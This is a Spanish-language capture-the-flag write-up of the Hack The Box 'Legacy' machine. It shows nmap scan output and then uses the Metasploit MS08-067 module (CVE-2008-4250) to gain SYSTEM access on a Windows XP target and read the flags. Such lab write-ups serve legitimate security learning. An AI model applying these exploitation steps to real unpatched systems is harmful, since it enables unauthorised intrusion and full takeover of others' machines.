Skip to main content

Command Palette

Search for a command to run...

Legacy WriteUp

Updated
2 min read
Legacy WriteUp

Iniciamos con un escaneo de puertos:

$ nmap -sV -Pn -sC -v 10.129.227.181

Como podemos observar, en el puerto 445 parece estar corriendo el servicio SMB y el sistema operativo remoto es WIndows XP, que utiliza Windows 2000 LAN Manager como protocolo SMB, esto indica que estamos frente a una maquina muy desactualizada y posiblemente vulnerable a varios exploits.

445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2025-11-03T06:34:10+02:00
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:86:25 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d03h57m35s, deviation: 1h24m50s, median: 5d02h57m35s

Realizamos un escaneo de nmap para ver vulnerabilidades en el puerto 445

$ nmap --script vuln -p445 10.129.227.181

Filtramos por el CVE-2008-4250 en metasploit

Vamos a utilizar el primer resultado, para ello simplemente podemos poner en la consola de metasploit use 0 o use windows/smb/ms08_067_netapi y finalmente con show options veremos las opciones disponibles del exploit

Verificamos que esten todas las opciones bien seteadas

Tras correr el exploit, obtendremos una sesion de meterpreter como NT AUTHORITY\SYSTEM dandonos asi, permiso total sobre el sistema

Obtenemos una shell y accedemos a las carpetas del sistema

Como somos NT AUTHORITY\SYSTEM obtenemos la flag de user y root


📌 Sígueme / Portfolio

🌐 Web: https://0xnano.com

🐦 X: https://x.com/0xN4no

🐙 GitHub: https://github.com/0xN4no

Nano

🔎 ¿Te gustó el writeup? Comentá o compartilo — siempre respondo dudas y me encanta ver mejoras/PRs.